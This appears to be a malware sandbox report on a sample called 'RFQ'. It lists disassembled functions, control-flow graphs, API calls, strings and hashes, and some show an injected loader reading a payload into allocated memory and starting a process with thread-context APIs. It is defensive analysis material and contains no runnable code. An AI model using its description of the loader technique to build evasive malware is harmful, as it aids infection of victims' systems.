                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                    • Opcode ID: 5840ea9c758f3240ac3e9b3ca0a12ad53c0bcc19d9e9de7800dcd829e4a3f95b
                                                                                                                                                    • Instruction ID: 9912a234f310f2a1f42f06acb6a6c7be4b7b9f14c7eb4f045120883dcce35245
                                                                                                                                                    • Opcode Fuzzy Hash: 5840ea9c758f3240ac3e9b3ca0a12ad53c0bcc19d9e9de7800dcd829e4a3f95b
                                                                                                                                                    • Instruction Fuzzy Hash: EB2133B0D00308EBDB14DFA9EC45BA9BBF5FB48310F50822AE614A22A1D7794640CF99
                                                                                                                                                    Function 010662A0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1021 10662a0-106634e call 1063c80 1024 1066355-106637b call 10671b0 CreateFileW 1021->1024 1027 1066382-1066392 1024->1027 1028 106637d 1024->1028 1033 1066394 1027->1033 1034 1066399-10663b3 VirtualAlloc 1027->1034 1029 10664cd-10664d1 1028->1029 1030 1066513-1066516 1029->1030 1031 10664d3-10664d7 1029->1031 1035 1066519-1066520 1030->1035 1036 10664e3-10664e7 1031->1036 1037 10664d9-10664dc 1031->1037 1033->1029 1038 10663b5 1034->1038 1039 10663ba-10663d1 ReadFile 1034->1039 1040 1066575-106658a 1035->1040 1041 1066522-106652d 1035->1041 1042 10664f7-10664fb 1036->1042 1043 10664e9-10664f3 1036->1043 1037->1036 1038->1029 1046 10663d3 1039->1046 1047 10663d8-1066418 VirtualAlloc 1039->1047 1050 106658c-1066597 VirtualFree 1040->1050 1051 106659a-10665a2 1040->1051 1048 1066531-106653d 1041->1048 1049 106652f 1041->1049 1044 10664fd-1066507 1042->1044 1045 106650b 1042->1045 1043->1042 1044->1045 1045->1030 1046->1029 1052 106641f-106643a call 1067400 1047->1052 1053 106641a 1047->1053 1054 1066551-106655d 1048->1054 1055 106653f-106654f 1048->1055 1049->1040 1050->1051 1061 1066445-106644f 1052->1061 1053->1029 1058 106655f-1066568 1054->1058 1059 106656a-1066570 1054->1059 1057 1066573 1055->1057 1057->1035 1058->1057 1059->1057 1062 1066482-1066496 call 1067210 1061->1062 1063 1066451-1066480 call 1067400 1061->1063 1068 106649a-106649e 1062->1068 1069 1066498 1062->1069 1063->1061 1071 10664a0-10664a4 CloseHandle 1068->1071 1072 10664aa-10664ae 1068->1072 1069->1029 1071->1072 1073 10664b0-10664bb VirtualFree 1072->1073 1074 10664be-10664c7 1072->1074 1073->1074 1074->1024 1074->1029
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01066371
                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01066597
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1063000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                                    • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                                                    • Instruction ID: 09312f0b068bdae7646d22356bc915bc10f8189b40f4b1bc6e1cc8d86a09266c
                                                                                                                                                    • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                                                    • Instruction Fuzzy Hash: B1A10A70E00209EBDB14CFA4C895BEEBBB9FF48304F108599E645BB280DB769A45CF54
                                                                                                                                                    Function 007349FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1130 7349fb-734a25 call 73bcce RegOpenKeyExW 1133 7a41cc-7a41e3 RegQueryValueExW 1130->1133 1134 734a2b-734a2f 1130->1134 1135 7a4246-7a424f RegCloseKey 1133->1135 1136 7a41e5-7a4222 call 74f4ea call 7347b7 RegQueryValueExW 1133->1136 1141 7a423d-7a4245 call 7347e2 1136->1141 1142 7a4224-7a423b call 736a63 1136->1142 1141->1135 1142->1141
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00734A1D
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007A41DB
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007A421A
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 007A4249
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue$CloseOpen
                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                    • API String ID: 1586453840-614718249
                                                                                                                                                    • Opcode ID: ea09baaebbf60d35b33d7c389c3efaf99e806c30effc3adc7d4344a7f80d6558
                                                                                                                                                    • Instruction ID: 70845e2280f4bd70d9e9e489dea121e952482dbd8444d3208f6e7add3a59cbc1
                                                                                                                                                    • Opcode Fuzzy Hash: ea09baaebbf60d35b33d7c389c3efaf99e806c30effc3adc7d4344a7f80d6558
                                                                                                                                                    • Instruction Fuzzy Hash: 10117271600108BFEB24ABA4CD86EFF7BBCEF05344F004168B502D2191EB79AE02D760
                                                                                                                                                    Function 007336B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1157 7336b8-733728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007336E6
                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733707
                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00733AA3,?), ref: 0073371B
                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00733AA3,?), ref: 00733724
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                    • Opcode ID: 8aa67fd7e33dafcceeca057a16b9712f03eaec161ff09305ffb0916b87db8372
                                                                                                                                                    • Instruction ID: b959c3372d37a6028130953c13731ded57f2c4adb6782a3c5a0cf564f94076af
                                                                                                                                                    • Opcode Fuzzy Hash: 8aa67fd7e33dafcceeca057a16b9712f03eaec161ff09305ffb0916b87db8372
                                                                                                                                                    • Instruction Fuzzy Hash: E3F0DA715402D4BAE7319757AC08F772F7DD7C6F20F40C12EBA04A21A0D9690C95DAB5
                                                                                                                                                    Function 01066030 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1262 1066030-106619f call 1063c80 call 1065f20 CreateFileW 1269 10661a6-10661b6 1262->1269 1270 10661a1 1262->1270 1273 10661bd-10661d7 VirtualAlloc 1269->1273 1274 10661b8 1269->1274 1271 1066256-106625b 1270->1271 1275 10661db-10661f2 ReadFile 1273->1275 1276 10661d9 1273->1276 1274->1271 1277 10661f6-1066230 call 1065f60 call 1064f20 1275->1277 1278 10661f4 1275->1278 1276->1271 1283 1066232-1066247 call 1065fb0 1277->1283 1284 106624c-1066254 ExitProcess 1277->1284 1278->1271 1283->1284 1284->1271
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 01065F20: Sleep.KERNELBASE(000001F4), ref: 01065F31
                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01066195
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1063000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileSleep
                                                                                                                                                    • String ID: IVJ7QSBPOR54HDCKVCGUTQRA
                                                                                                                                                    • API String ID: 2694422964-3692290500
                                                                                                                                                    • Opcode ID: 7e366ec23e9218ad4efc00f14ebe39b61088484ca7526974e83e58e39ffc50e2
                                                                                                                                                    • Instruction ID: 3934235ba7f691eeb0994a941c76596e43e660e128ad64326d89fd13739d2fb7
                                                                                                                                                    • Opcode Fuzzy Hash: 7e366ec23e9218ad4efc00f14ebe39b61088484ca7526974e83e58e39ffc50e2
                                                                                                                                                    • Instruction Fuzzy Hash: C1617430D04289DAEF11DBE4C854BEFBB79AF15304F044198E649BB2C1D7BA5B44CBA5
                                                                                                                                                    Function 007351AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1286 7351af-7351c5 1287 7352a2-7352a6 1286->1287 1288 7351cb-7351e0 call 736b0f 1286->1288 1291 7351e6-735206 call 736a63 1288->1291 1292 7a3ca1-7a3cb0 LoadStringW 1288->1292 1295 7a3cbb-7a3cd3 call 73510d call 734db1 1291->1295 1296 73520c-735210 1291->1296 1292->1295 1305 735220-73529d call 750d50 call 7350e6 call 750d23 Shell_NotifyIconW call 73cb37 1295->1305 1308 7a3cd9-7a3cf7 call 73518c call 734db1 call 73518c 1295->1308 1298 7352a7-7352b0 call 736eed 1296->1298 1299 735216-73521b call 73510d 1296->1299 1298->1305 1299->1305 1305->1287 1308->1305
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0073522F
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00735283
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00735293
                                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007A3CB0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                                                    • String ID: Line:
                                                                                                                                                    • API String ID: 1053898822-1585850449
                                                                                                                                                    • Opcode ID: e530b4910478d1423e9dc9e1049c2d4ee84224c3cd38c37818b7f5b2c1f72736
                                                                                                                                                    • Instruction ID: dfc61c72cf48fcbd15c906de8b690f5d1a4d0d4ee2d8560a748484e5c5d7b9c0
                                                                                                                                                    • Opcode Fuzzy Hash: e530b4910478d1423e9dc9e1049c2d4ee84224c3cd38c37818b7f5b2c1f72736
                                                                                                                                                    • Instruction Fuzzy Hash: C73190B1108744EBE321EB60DC4AFEB77D8AB44310F40851AF58592192EB7CA648CB97
                                                                                                                                                    Function 00734139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 007341A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007339FE,?,00000001), ref: 007341DB
                                                                                                                                                    • _free.LIBCMT ref: 007A36B7
                                                                                                                                                    • _free.LIBCMT ref: 007A36FE
                                                                                                                                                      • Part of subcall function 0073C833: __wsplitpath.LIBCMT ref: 0073C93E
                                                                                                                                                      • Part of subcall function 0073C833: _wcscpy.LIBCMT ref: 0073C953
                                                                                                                                                      • Part of subcall function 0073C833: _wcscat.LIBCMT ref: 0073C968
                                                                                                                                                      • Part of subcall function 0073C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0073C978
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                    • API String ID: 805182592-1757145024
                                                                                                                                                    • Opcode ID: f4218894fb396381b9e27d4fbea62334e6b8da1a9751d0b8e3a27162f1f4a809
                                                                                                                                                    • Instruction ID: 8f37a7233e2239577daddcc1de20dc49a5c9e855a64080b4c10ecc76dac10c71
                                                                                                                                                    • Opcode Fuzzy Hash: f4218894fb396381b9e27d4fbea62334e6b8da1a9751d0b8e3a27162f1f4a809
                                                                                                                                                    • Instruction Fuzzy Hash: 13917271910219EFDF05EFA4CC559EEB7B4BF49310F104529F416AB291DB38AA15CF50
                                                                                                                                                    Function 00734A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00735374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007F1148,?,007361FF,?,00000000,00000001,00000000), ref: 00735392
                                                                                                                                                      • Part of subcall function 007349FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00734A1D
                                                                                                                                                    • _wcscat.LIBCMT ref: 007A2D80
                                                                                                                                                    • _wcscat.LIBCMT ref: 007A2DB5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat$FileModuleNameOpen
                                                                                                                                                    • String ID: \$\Include\
                                                                                                                                                    • API String ID: 3592542968-2640467822
                                                                                                                                                    • Opcode ID: 6d8bc746680587118652562800bcd075b0876eec2846f36ff74382c013941682
                                                                                                                                                    • Instruction ID: e5b6cdc18b410b186354de1648548290a45ff422ad8b5d91db1017a0f60a6d44
                                                                                                                                                    • Opcode Fuzzy Hash: 6d8bc746680587118652562800bcd075b0876eec2846f36ff74382c013941682
                                                                                                                                                    • Instruction Fuzzy Hash: 45517271508344DFD314EF59D9858AAB7F8BE89300F40852EF64593263EB7C990ACB5A
                                                                                                                                                    Function 007340E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 007A3725
                                                                                                                                                    • GetOpenFileNameW.COMDLG32 ref: 007A376F
                                                                                                                                                      • Part of subcall function 0073660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007353B1,?,?,007361FF,?,00000000,00000001,00000000), ref: 0073662F
                                                                                                                                                      • Part of subcall function 007340A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007340C6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                    • String ID: X$t3~
                                                                                                                                                    • API String ID: 3777226403-4047483641
                                                                                                                                                    • Opcode ID: f646a77bed534a6533aa9dcb200c17c9202f4c1955a3b90f372d1c15e771459e
                                                                                                                                                    • Instruction ID: 09e6cac87a31146c3ec925929db3c1750afbda54279b75ccde5e517df80147ef
                                                                                                                                                    • Opcode Fuzzy Hash: f646a77bed534a6533aa9dcb200c17c9202f4c1955a3b90f372d1c15e771459e
                                                                                                                                                    • Instruction Fuzzy Hash: 8E21A871A10198EBDB05DF94D849BEE7BF89F49304F108059E405A7241DBBC6A898F65
                                                                                                                                                    Function 007534AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getstream.LIBCMT ref: 007534FE
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00753539
                                                                                                                                                    • __wopenfile.LIBCMT ref: 00753549
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                    • String ID: <G
                                                                                                                                                    • API String ID: 1820251861-2138716496
                                                                                                                                                    • Opcode ID: ac3f64fc4a406efd23ac5dda6a4b90a1232d3233cfc9d9690dad1a413a51d32c
                                                                                                                                                    • Instruction ID: 6f5f1c99f4c92784db633c509b3e8506e292260cfe5e99c5c5705e813e160c8f
                                                                                                                                                    • Opcode Fuzzy Hash: ac3f64fc4a406efd23ac5dda6a4b90a1232d3233cfc9d9690dad1a413a51d32c
                                                                                                                                                    • Instruction Fuzzy Hash: 3B11E7B0A00206DBDB56BF709C466FE36A4AF05392B148925FC15C7291FAFCCB1997B1
                                                                                                                                                    Function 0074D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0074D28B,SwapMouseButtons,00000004,?), ref: 0074D2BC
                                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0074D28B,SwapMouseButtons,00000004,?,?,?,?,0074C865), ref: 0074D2DD
                                                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,0074D28B,SwapMouseButtons,00000004,?,?,?,?,0074C865), ref: 0074D2FF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                                    • Opcode ID: 26c9988c475bdd3d5ffd34f534d936d36bc4e3003a08c6590887eb5e3ac8f9dd
                                                                                                                                                    • Instruction ID: c40b0b5dcf9862c1cb4e4bc8752b1143b648e494b247acdce4d1ba544b9d9e18
                                                                                                                                                    • Opcode Fuzzy Hash: 26c9988c475bdd3d5ffd34f534d936d36bc4e3003a08c6590887eb5e3ac8f9dd
                                                                                                                                                    • Instruction Fuzzy Hash: E1115375611208FFDB218FA8CC88EAE7BB8EF04740F008929E841D7210E775AE40AB64
                                                                                                                                                    Function 01064F20 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 010656DB
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01065771
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01065793
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1063000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                    • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                                                                                                    • Instruction ID: 9c55838ca3b5200923f0952ee0d0488aff495b1e702dd940f9bf8c0ad84ddd98
                                                                                                                                                    • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                                                                                                    • Instruction Fuzzy Hash: D662FB30A14258DBEB24CFA4CC51BDEB776EF58300F1091A9D14DEB290E77A9E81CB59
                                                                                                                                                    Function 0077C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00734517: _fseek.LIBCMT ref: 0073452F
                                                                                                                                                      • Part of subcall function 0077C56D: _wcscmp.LIBCMT ref: 0077C65D
                                                                                                                                                      • Part of subcall function 0077C56D: _wcscmp.LIBCMT ref: 0077C670
                                                                                                                                                    • _free.LIBCMT ref: 0077C4DD
                                                                                                                                                    • _free.LIBCMT ref: 0077C4E4
                                                                                                                                                    • _free.LIBCMT ref: 0077C54F
                                                                                                                                                      • Part of subcall function 00751C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00757A85), ref: 00751CB1
                                                                                                                                                      • Part of subcall function 00751C9D: GetLastError.KERNEL32(00000000,?,00757A85), ref: 00751CC3
                                                                                                                                                    • _free.LIBCMT ref: 0077C557
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
